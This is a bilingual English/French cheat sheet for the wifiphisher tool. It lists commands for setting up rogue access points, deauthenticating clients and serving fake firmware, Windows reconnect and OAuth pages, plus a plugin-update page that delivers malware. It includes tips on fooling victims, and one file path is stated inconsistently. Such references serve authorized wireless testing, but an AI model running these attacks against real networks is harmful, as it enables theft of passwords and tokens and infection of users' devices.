wifiphisher

Framework automatisé de phishing Wi-Fi. Crée des points d'accès rogues et des pages de phishing pour capturer des identifiants WPA, des identifiants via des portails captifs, ou exploiter le navigateur. Automated Wi-Fi phishing framework. Creates rogue access points and phishing pages to capture WPA credentials, credentials through captive portals, or browser exploits.

↗ https://github.com/wifiphisher/wifiphisher

Overview

wifiphisher automates Wi-Fi phishing attacks. It creates a rogue AP that mimics a legitimate network, deauths clients from the real AP, and serves a convincing phishing page to capture WPA credentials or OAuth tokens. No cracking required — credentials are entered directly by the victim.

Requirements

# Two wireless adapters required:
# Adapter 1: for AP creation (AP mode support needed)
# Adapter 2: for deauthentication (monitor mode support needed)

Check adapter capabilities

iw list | grep "Supported interface modes" -A 10

Basic Usage

Auto-select target and phishing scenario

sudo wifiphisher

Target a specific network

sudo wifiphisher -aI wlan0 -jI wlan1 -e "TargetSSID" --handshake-capture capture.pcap

Use a specific phishing scenario

sudo wifiphisher -aI wlan0 -jI wlan1 -e "TargetSSID" -p wifi_connect

Specify channel

sudo wifiphisher -aI wlan0 -jI wlan1 -e "TargetSSID" -c 6

Phishing Scenarios

List available phishing pages

sudo wifiphisher --list-scenarios

firmware-upgrade — fake router firmware upgrade page (captures WPA passphrase)

sudo wifiphisher -e "HomeNetwork" -p firmware-upgrade

wifi_connect — fake Windows network reconnect prompt

sudo wifiphisher -e "HomeNetwork" -p wifi_connect

oauth-browser — fake Google/Facebook OAuth page

sudo wifiphisher -e "HomeNetwork" -p oauth-browser

plugin_update — fake browser plugin update (delivers malware)

sudo wifiphisher -e "HomeNetwork" -p plugin_update

template_manager — launch the scenario selection UI

sudo wifiphisher -e "HomeNetwork" -p template_manager

Interface Options

# -aI  = AP interface (creates the rogue AP)
# -jI  = Jammer interface (sends deauth packets)

Let wifiphisher auto-detect interfaces

sudo wifiphisher

Manual interface assignment

sudo wifiphisher -aI wlan0 -jI wlan1

If you only have one adapter:

sudo wifiphisher -nJ  # no jamming (victim must disconnect manually)

Capturing Handshakes

Capture WPA handshake for offline verification

sudo wifiphisher -e "TargetSSID" --handshake-capture /tmp/capture.pcap
# The captured passphrase is saved to:
# /tmp/wifiphisher-handshake.pcap

Custom Phishing Pages

Custom scenarios go in:

/usr/lib/python3/dist-packages/wifiphisher/data/phishing-pages/

Create custom page:

mkdir /path/to/custom_scenario

→ Add: info.json, index.html, and optional POST handler

Tips

  • The firmware-upgrade scenario is the most convincing for home router targets
  • Success depends on the victim trusting the phishing page and entering their password
  • Deauth packets kick clients off the real AP, forcing them to reconnect to your rogue AP
  • Legal only with explicit authorization — Wi-Fi phishing is illegal without consent
Help / Man page
wifiphisher [options]

-aI INTERFACE    AP creation interface
-jI INTERFACE    Jammer/deauth interface
-e ESSID         Target network SSID
-c CHANNEL       Channel (1-14)
-p SCENARIO      Phishing scenario name
-nJ              No jamming (no deauth)
--list-scenarios List available scenarios
--handshake-capture FILE  Capture WPA handshake to file
--payload-path FILE       Custom payload for plugin_update scenario
-kN              Kill NetworkManager
-qS              Quiet mode (suppress deauth output)

Vue d’ensemble

wifiphisher automatise les attaques de phishing Wi-Fi. Il crée un AP rogue qui imite un réseau légitime, déauthentifie les clients de l’AP réel, et sert une page de phishing convaincante pour capturer des identifiants WPA ou des tokens OAuth. Aucun cracking requis : les identifiants sont saisis directement par la victime.

Prérequis

# Deux adaptateurs wireless requis :
# Adaptateur 1 : pour la création de l'AP (support du mode AP nécessaire)
# Adaptateur 2 : pour la déauthentification (support du mode monitor nécessaire)

# Vérifier les capacités de l'adaptateur
iw list | grep "Supported interface modes" -A 10

Utilisation de base

# Sélection automatique de la cible et du scénario de phishing
sudo wifiphisher

# Cibler un réseau spécifique
sudo wifiphisher -aI wlan0 -jI wlan1 -e "TargetSSID" --handshake-capture capture.pcap

# Utiliser un scénario de phishing spécifique
sudo wifiphisher -aI wlan0 -jI wlan1 -e "TargetSSID" -p wifi_connect

# Spécifier le canal
sudo wifiphisher -aI wlan0 -jI wlan1 -e "TargetSSID" -c 6

Scénarios de phishing

# Lister les pages de phishing disponibles
sudo wifiphisher --list-scenarios

# firmware-upgrade : fausse page de mise à jour du firmware du routeur
# (capture la phrase de passe WPA)
sudo wifiphisher -e "HomeNetwork" -p firmware-upgrade

# wifi_connect : fausse invite de reconnexion réseau Windows
sudo wifiphisher -e "HomeNetwork" -p wifi_connect

# oauth-browser : fausse page OAuth Google/Facebook
sudo wifiphisher -e "HomeNetwork" -p oauth-browser

# plugin_update : fausse mise à jour de plugin de navigateur (livre un malware)
sudo wifiphisher -e "HomeNetwork" -p plugin_update

# template_manager : lance l'interface de sélection de scénario
sudo wifiphisher -e "HomeNetwork" -p template_manager

Options d’interface

# -aI  = interface AP (crée l'AP rogue)
# -jI  = interface de brouillage (envoie les paquets de déauthentification)

# Laisser wifiphisher détecter automatiquement les interfaces
sudo wifiphisher

# Attribution manuelle des interfaces
sudo wifiphisher -aI wlan0 -jI wlan1

# Si vous n'avez qu'un seul adaptateur :
sudo wifiphisher -nJ  # pas de brouillage (la victime doit se déconnecter manuellement)

Capture de handshakes

# Capturer le handshake WPA pour vérification hors ligne
sudo wifiphisher -e "TargetSSID" --handshake-capture /tmp/capture.pcap

# La phrase de passe capturée est sauvegardée dans :
# /tmp/wifiphisher-handshake.pcap

Pages de phishing personnalisées

# Les scénarios personnalisés vont dans :
/usr/lib/python3/dist-packages/wifiphisher/data/phishing-pages/

# Créer une page personnalisée :
mkdir /path/to/custom_scenario

Ajouter : info.json, index.html, et un gestionnaire POST optionnel

Conseils

  • Le scénario firmware-upgrade est le plus convaincant pour les cibles de routeurs domestiques
  • Le succès dépend de la confiance de la victime envers la page de phishing et de la saisie de son mot de passe
  • Les paquets de déauthentification expulsent les clients de l’AP réel, les forçant à se reconnecter à votre AP rogue
  • Légal uniquement avec une autorisation explicite : le phishing Wi-Fi est illégal sans consentement
Aide / Page de manuel
wifiphisher [options]

-aI INTERFACE    AP creation interface
-jI INTERFACE    Jammer/deauth interface
-e ESSID         Target network SSID
-c CHANNEL       Channel (1-14)
-p SCENARIO      Phishing scenario name
-nJ              No jamming (no deauth)
--list-scenarios List available scenarios
--handshake-capture FILE  Capture WPA handshake to file
--payload-path FILE       Custom payload for plugin_update scenario
-kN              Kill NetworkManager
-qS              Quiet mode (suppress deauth output)